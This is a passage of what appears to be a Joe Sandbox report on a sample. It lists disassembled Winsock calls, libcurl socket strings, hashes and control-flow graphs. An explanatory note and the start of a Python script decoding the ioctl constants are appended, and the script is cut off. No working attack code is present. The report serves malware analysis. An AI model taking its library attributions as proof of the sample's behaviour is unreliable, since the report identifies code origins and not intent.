                                                          • Opcode ID: 05550cb35058540eba83595858a025c745ab68770673216824298270cfaa427f
                                                          • Instruction ID: 4094981915a10c776f37c28e02b80e5d39f2fcc03e822feb6328d56d11455c0a
                                                          • Opcode Fuzzy Hash: 05550cb35058540eba83595858a025c745ab68770673216824298270cfaa427f
                                                          • Instruction Fuzzy Hash: 4E72C1B1608301ABE310EB24CC85F5B77E8AF85744F144C2AFA45972A1EBB8E855CB57
                                                          APIs
                                                          • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0040A832
                                                          Strings
                                                          • Trying [%s]:%d..., xrefs: 0040A689
                                                          • @, xrefs: 0040AC42
                                                          • Could not set TCP_NODELAY: %s, xrefs: 0040A871
                                                          • Couldn't bind to '%s' with errno %d: %s, xrefs: 0040AE1F
                                                          • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0040A6CE
                                                          • Local Interface %s is ip %s using address family %i, xrefs: 0040AE60
                                                          • Bind to local port %d failed, trying next, xrefs: 0040AFE5
                                                          • @, xrefs: 0040A8F4
                                                          • Local port: %hu, xrefs: 0040AF28
                                                          • bind failed with errno %d: %s, xrefs: 0040B080
                                                          • cf-socket.c, xrefs: 0040A5CD, 0040A735
                                                          • Trying %s:%d..., xrefs: 0040A7C2, 0040A7DE
                                                          • Name '%s' family %i resolved to '%s' family %i, xrefs: 0040ADAC
                                                          • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0040AD0A
                                                          • cf_socket_open() -> %d, fd=%d, xrefs: 0040A796
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: setsockopt
                                                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3981526788-2373386790
                                                          • Opcode ID: 27d2b173f19a8f14d2cdcf87ff0e8995f93b51ac8b7603dec172077d8fec64e8
                                                          • Instruction ID: 60f7b6d578ec984613823cf852a0db077b75f1965156ff40aed6e738d820cbe1
                                                          • Opcode Fuzzy Hash: 27d2b173f19a8f14d2cdcf87ff0e8995f93b51ac8b7603dec172077d8fec64e8
                                                          • Instruction Fuzzy Hash: 5C620371508341ABE721CF24C846BABB3E4EF85304F04492EF988A72D2E775E955CB97

                                                          Control-flow Graph (rendered graph; node data not reproduced)
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00499946
                                                          • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00499974
                                                          • RegCloseKey.KERNELBASE(?), ref: 0049998B
                                                          Strings
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                          • API String ID: 3677997916-615551945
                                                          • Opcode ID: a71a328388c7b808e46c1c8199aa3dcbf960d7b742ec827a70f78fcc1cfe9701
                                                          • Instruction ID: 260c83871467cab2c75a7a69b357ec8979e2dfd10955e0b37549782d0785b92b
                                                          • Opcode Fuzzy Hash: a71a328388c7b808e46c1c8199aa3dcbf960d7b742ec827a70f78fcc1cfe9701
                                                          • Instruction Fuzzy Hash: 4E32D8F1904201ABEF11AB26AC42A1B7A94AF45318F08483EFD0996363F739ED15C75B

                                                          Control-flow Graph (rendered graph; node data not reproduced)
                                                          APIs
                                                          • connect.WS2_32(?,?,00000001), ref: 00408C30
                                                          • SleepEx.KERNELBASE(00000000,00000000), ref: 00408CF3
                                                          • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00408D0F
                                                          Strings
                                                          Similarity
                                                          • API ID: Sleepconnectgetsockopt
                                                          • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                          • API String ID: 1669343778-879669977
                                                          • Opcode ID: b9b0d92aecc42218864815dbca828e4fe9110c7138b015e0454d33799225d9c3
                                                          • Instruction ID: c68c18307dc37c9bfbbba0e74596b06502016c26a432f1d287dd3e01ac1cf196
                                                          • Opcode Fuzzy Hash: b9b0d92aecc42218864815dbca828e4fe9110c7138b015e0454d33799225d9c3
                                                          • Instruction Fuzzy Hash: 53B19F70604306AFE710CF24CA85BA777E0AF55318F04863EF899AA3D2DB78E855C765

                                                          Control-flow Graph (rendered graph; node data not reproduced)
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: EnumOpen
                                                          • String ID: d
                                                          • API String ID: 3231578192-2564639436
                                                          • Opcode ID: a7848cb3d0563e602b4829b4b6588f37371665f359999986e6052cfd8485a635
                                                          • Instruction ID: 94951d0ebb54ae798d2ab4c5f2298f1cd0485e8614887d92d88d26f522a46d28
                                                          • Opcode Fuzzy Hash: a7848cb3d0563e602b4829b4b6588f37371665f359999986e6052cfd8485a635
                                                          • Instruction Fuzzy Hash: 3B7183B490431A9FDB50DF69D98479EBBF0BF84308F108869E89897351D7749A88CF92

                                                          Control-flow Graph (rendered graph; node data not reproduced)
                                                          APIs
                                                          • send.WS2_32(multi.c,?,?,?,N==,00000000,?,?,003E07BF), ref: 003D76EB
                                                          Strings
                                                          Similarity
                                                          • API ID: send
                                                          • String ID: LIMIT %s:%d %s reached memlimit$N==$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                          • API String ID: 2809346765-3656297102
                                                          • Opcode ID: 96be71b4a4dbfdc22a156f61794712b33eaeb6834e8134f4a605c9720a6dcfc7
                                                          • Instruction ID: 439f5d45f790696b103db0e7a99ce4f5d4b0650e2a573574d43f7f8492c388c0
                                                          • Opcode Fuzzy Hash: 96be71b4a4dbfdc22a156f61794712b33eaeb6834e8134f4a605c9720a6dcfc7
                                                          • Instruction Fuzzy Hash: 82117AB3A293157BE521D704BC86D377BACDBC2B6CF46091AB80417392F261DD0082F2

                                                          Control-flow Graph (rendered graph; node data not reproduced)
                                                          APIs
                                                          • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0040935D
                                                          • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00409389
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: Ioctlsetsockopt
                                                          • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                          • API String ID: 1903391676-2691795271
                                                          • Opcode ID: 4754b1dcc1b60ac0c872edc66c2de605ce9642f4a83b5e9c0ee698d457e1a42c
                                                          • Instruction ID: 37359bec1750b6f9a8400ac471887d5eff2861ae96126e1bf9dbc39880943a0e
                                                          • Opcode Fuzzy Hash: 4754b1dcc1b60ac0c872edc66c2de605ce9642f4a83b5e9c0ee698d457e1a42c
                                                          • Instruction Fuzzy Hash: AA51CF70604305ABD711DF25C881BAAB7A5FF88314F14852AFD48AB3D2E734ED91CB95

                                                          Control-flow Graph

                                                          control_flow_graph 1640 3d7770-3d778e 1641 3d77b6-3d77c2 recv 1640->1641 1642 3d7790-3d7797 1640->1642 1644 3d782e-3d7832 1641->1644 1645 3d77c4-3d77d9 call 3d72a0 1641->1645 1642->1641 1643 3d7799-3d77a1 1642->1643 1647 3d77db-3d7829 call 3d72a0 call 3dcb20 call 758c50 1643->1647 1648 3d77a3-3d77b4 1643->1648 1645->1644 1647->1644 1648->1645
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                          • API String ID: 1507349165-640788491
                                                          • Opcode ID: 22d65b7f1a3e7fa1925ac50335d21af7e080c1ce7605c52aa5dac51f19891e12
                                                          • Instruction ID: 08c6b06494101d6462637485cc84d0537ae4ae40d65bc65649396ad0c5915404
                                                          • Opcode Fuzzy Hash: 22d65b7f1a3e7fa1925ac50335d21af7e080c1ce7605c52aa5dac51f19891e12
                                                          • Instruction Fuzzy Hash: 4B1150B7A163457FE1219B54BC4AE37779CDBC2B6CF46091DF80463392E6619D0081F2

                                                          Control-flow Graph

                                                          control_flow_graph 1659 3d75e0-3d75ed 1660 3d75ef-3d75f6 1659->1660 1661 3d7607-3d7629 socket 1659->1661 1660->1661 1662 3d75f8-3d75ff 1660->1662 1663 3d763f-3d7642 1661->1663 1664 3d762b-3d763c call 3d72a0 1661->1664 1665 3d7601-3d7602 1662->1665 1666 3d7643-3d7699 call 3d72a0 call 3dcb20 call 758c50 1662->1666 1664->1663 1665->1661
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                          • API String ID: 98920635-842387772
                                                          • Opcode ID: cec241dc33d0e9c7b35196f2982c375fdb8aa3b7956934f2399ac58682c609f2
                                                          • Instruction ID: 6b8247a46a2047df699054cc2836d8d1d53d71d47e8a489a026f4530560a3670
                                                          • Opcode Fuzzy Hash: cec241dc33d0e9c7b35196f2982c375fdb8aa3b7956934f2399ac58682c609f2
                                                          • Instruction Fuzzy Hash: AE114C73A152527BDA125B79BC16F8B3B98DFC2729F460925F810963E2F311C954C2E1

                                                          Control-flow Graph

                                                          control_flow_graph 1768 40a150-40a159 1769 40a250 1768->1769 1770 40a15f-40a17b 1768->1770 1771 40a181-40a1ce getsockname 1770->1771 1772 40a249-40a24f 1770->1772 1773 40a1d0-40a1f5 call 3ed090 1771->1773 1774 40a1f7-40a214 call 40ef30 1771->1774 1772->1769 1781 40a240-40a246 call 414f40 1773->1781 1774->1772 1778 40a216-40a23b call 3ed090 1774->1778 1778->1781 1781->1772
                                                          APIs
                                                          • getsockname.WS2_32(?,?,00000080), ref: 0040A1C6
                                                          Strings
                                                          • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0040A23B
                                                          • getsockname() failed with errno %d: %s, xrefs: 0040A1F0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3358416759-2605427207
                                                          • Opcode ID: 26132af829b0007d420b74cc1582ca8f99acc0ad5ef878fd89b8618bcd320f16
                                                          • Instruction ID: a95ed266b88f6056a4507277b86565eba10d1d24400084d797519de61472db80
                                                          • Opcode Fuzzy Hash: 26132af829b0007d420b74cc1582ca8f99acc0ad5ef878fd89b8618bcd320f16
                                                          • Instruction Fuzzy Hash: D921DB71808380B6E6269719DC46FE773ACEF81328F040665F99863191FE326D9687E6

                                                          Control-flow Graph

                                                          control_flow_graph 1788 3ed5e0-3ed5ee 1789 3ed652-3ed662 WSAStartup 1788->1789 1790 3ed5f0-3ed604 call 3ed690 1788->1790 1791 3ed664-3ed66f 1789->1791 1792 3ed670-3ed676 1789->1792 1796 3ed61b-3ed651 call 3f7620 1790->1796 1797 3ed606-3ed614 1790->1797 1792->1790 1794 3ed67c-3ed68d 1792->1794 1797->1796 1802 3ed616 1797->1802 1802->1796
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202), ref: 003ED65A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: Startup
                                                          • String ID: if_nametoindex$iphlpapi.dll
                                                          • API String ID: 724789610-3097795196
                                                          • Opcode ID: 86baf134445dad8c65a1f763b0f9e793badbc92ecdec42856746f7f465138f2c
                                                          • Instruction ID: 9d16ee94ad2a562c89f09eacde66e93c16a7205382a62069fa8ce9137a5737c8
                                                          • Opcode Fuzzy Hash: 86baf134445dad8c65a1f763b0f9e793badbc92ecdec42856746f7f465138f2c
                                                          • Instruction Fuzzy Hash: 8F017BD0D4438256EF02AB7EAD1736666901B53308F861A78E888961D3F769C988C293

                                                          Control-flow Graph

control_flow_graph 1804 49aa30-49aa64 1806 49aa6a-49aaa7 call 48e730 1804->1806 1807 49ab04-49ab09 1804->1807 1811 49aaa9-49aabd 1806->1811 1812 49ab0e-49ab13 1806->1812 1808 49ae80-49ae89 1807->1808 1813 49ab18-49ab50 1811->1813 1814 49aabf-49aac7 1811->1814 1815 49ae2e 1812->1815 1821 49ab58-49ab6d 1813->1821 1814->1815 1816 49aacd-49ab02 1814->1816 1817 49ae30-49ae4a call 48ea60 call 48ebf0 1815->1817 1816->1821 1831 49ae4c-49ae57 1817->1831 1832 49ae75-49ae7d 1817->1832 1823 49ab6f-49ab73 1821->1823 1824 49ab96-49abab socket 1821->1824 1823->1824 1827 49ab75-49ab8f 1823->1827 1824->1815 1826 49abb1-49abc5 1824->1826 1829 49abd0-49abed ioctlsocket 1826->1829 1830 49abc7-49abca 1826->1830 1827->1826 1845 49ab91 1827->1845 1836 49abef-49ac0a 1829->1836 1837 49ac10-49ac14 1829->1837 1830->1829 1835 49ad2e-49ad39 1830->1835 1833 49ae59-49ae5e 1831->1833 1834 49ae6e-49ae6f 1831->1834 1832->1808 1833->1834 1839 49ae60-49ae6c 1833->1839 1843 49ad3b-49ad4c 1835->1843 1844 49ad52-49ad56 1835->1844 1836->1837 1846 49ae29 1836->1846 1840 49ac37-49ac41 1837->1840 1841 49ac16-49ac31 1837->1841 1839->1832 1849 49ac7a-49ac7e 1840->1849 1850 49ac43-49ac46 1840->1850 1841->1840 1841->1846 1843->1844 1843->1846 1844->1846 1847 49ad5c-49ad6b 1844->1847 1845->1815 1846->1815 1855 49ad70-49ad78 1847->1855 1852 49ac80-49ac9b 1849->1852 1853 49ace7-49acfe 1849->1853 1857 49ac4c-49ac51 1850->1857 1858 49ad04-49ad08 1850->1858 1852->1853 1859 49ac9d-49acc1 1852->1859 1853->1858 1860 49ad7a-49ad7f 1855->1860 1861 49ada0-49adae connect 1855->1861 1857->1858 1863 49ac57-49ac78 1857->1863 1858->1835 1862 49ad0a-49ad28 1858->1862 1864 49acc6-49acd7 1859->1864 1860->1861 1865 49ad81-49ad99 1860->1865 1866 49adb3-49adcf 1861->1866 1862->1835 1862->1846 1863->1864 1864->1846 1872 49acdd-49ace5 1864->1872 1865->1866 1873 49ae8a-49ae91 1866->1873 1874 49add5-49add8 1866->1874 1872->1853 1872->1858 1873->1817 1875 49adda-49addf 1874->1875 1876 49ade1-49adf1 1874->1876 1875->1855 1875->1876 1877 49ae0d-49ae12 1876->1877 1878 49adf3-49ae07 1876->1878 1879 49ae1a-49ae1c call 49af70 1877->1879 1880 49ae14-49ae17 1877->1880 1878->1877 1883 49aea8-49aead 1878->1883 1884 49ae21-49ae23 1879->1884 1880->1879 1883->1817 1885 49ae93-49ae9d 1884->1885 1886 49ae25-49ae27 1884->1886 1887 49aeaf-49aeb1 call 48e760 1885->1887 1888 49ae9f-49aea6 call 48e7c0 1885->1888 1886->1817 1891 49aeb6-49aebe 1887->1891 1888->1891 1893 49af1a-49af1f 1891->1893 1894 49aec0-49aedb call 48e180 1891->1894 1893->1817 1894->1817 1897 49aee1-49aeec 1894->1897 1898 49aeee-49aeff 1897->1898 1899 49af02-49af06 1897->1899 1898->1899 1900 49af08-49af0b 1899->1900 1901 49af0e-49af15 1899->1901 1900->1901 1901->1808
                                                          APIs
                                                          • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0049AB9A
                                                          • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0049ABE4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: ioctlsocketsocket
                                                          • String ID:
                                                          • API String ID: 416004797-0
                                                          • Opcode ID: f6b756e53508874e49483d46864991f1c37ccdc66ce6790cb8dcc6d27d16fe89
                                                          • Instruction ID: f661d201fa2041b7e5e01dbfd0a44ccb3fa2a3154a588c38cff7a7823253a811
                                                          • Opcode Fuzzy Hash: f6b756e53508874e49483d46864991f1c37ccdc66ce6790cb8dcc6d27d16fe89
                                                          • Instruction Fuzzy Hash: A6E1B0706043029BEF20CF14C885B6B7BA5EF85304F144A3EF9988B391E779D954CB96
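The hex arguments in the API records of the socket routines above are raw Winsock constants: 4004747B in the WSAIoctl call is SIO_IDEAL_SEND_BACKLOG_QUERY, the 0000FFFF/00001001 pair passed to setsockopt is SOL_SOCKET/SO_SNDBUF, 8004667E in ioctlsocket is FIONBIO (with argp 1, i.e. switch the socket to non-blocking), and 00000202 in WSAStartup is MAKEWORD(2,2). Read together with the format strings the plugin lists next to them (cf-socket.c, "Send failure: %s", "getsockname() failed with errno %d: %s", "FD %s:%d socket() = %d", the iphlpapi.dll/if_nametoindex pair), these functions are libcurl's cf-socket.c, system_win32.c and memdebug.c routines (memdebug.c is only compiled into curl's CURLDEBUG builds) statically linked into the sample, so the socket-level signatures here attribute to the library rather than to hand-written network code. The Python decoder below is an added example and is not part of the Joe Sandbox report or of curl: it rebuilds the ioctl codes from the winsock2.h/mstcpip.h macros instead of hard-coding hex, resolves the argument positions of the four recorded calls, and parses this report's `api.module(args), ref: addr` record format, treating `?` as a value the analysis did not recover. The list of known names is deliberately short and is an assumption about which codes are worth resolving, not an exhaustive table.

```python
"""Resolve the raw Winsock constants in the API call records of this report."""
import re
from dataclasses import dataclass
from typing import Optional

# Bit layout from winsock2.h: direction bits, Winsock2 family bits, BSD parameter-size mask
IOC_VOID, IOC_OUT, IOC_IN = 0x20000000, 0x40000000, 0x80000000
IOC_INOUT = IOC_IN | IOC_OUT
IOC_UNIX, IOC_WS2, IOC_PROTOCOL, IOC_VENDOR = 0x00000000, 0x08000000, 0x10000000, 0x18000000
IOCPARM_MASK = 0x7F
DIRECTIONS = {IOC_VOID: "VOID", IOC_OUT: "OUT", IOC_IN: "IN", IOC_INOUT: "INOUT"}
FAMILIES = {IOC_UNIX: "IOC_UNIX", IOC_WS2: "IOC_WS2", IOC_PROTOCOL: "IOC_PROTOCOL", IOC_VENDOR: "IOC_VENDOR"}

# The SDK's _IO/_IOR/_IOW and _WSAIO* macros; size defaults to sizeof(u_long) == 4 on Win32
def _io(group, num): return IOC_VOID | (ord(group) << 8) | num
def _ior(group, num, size=4): return IOC_OUT | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | num
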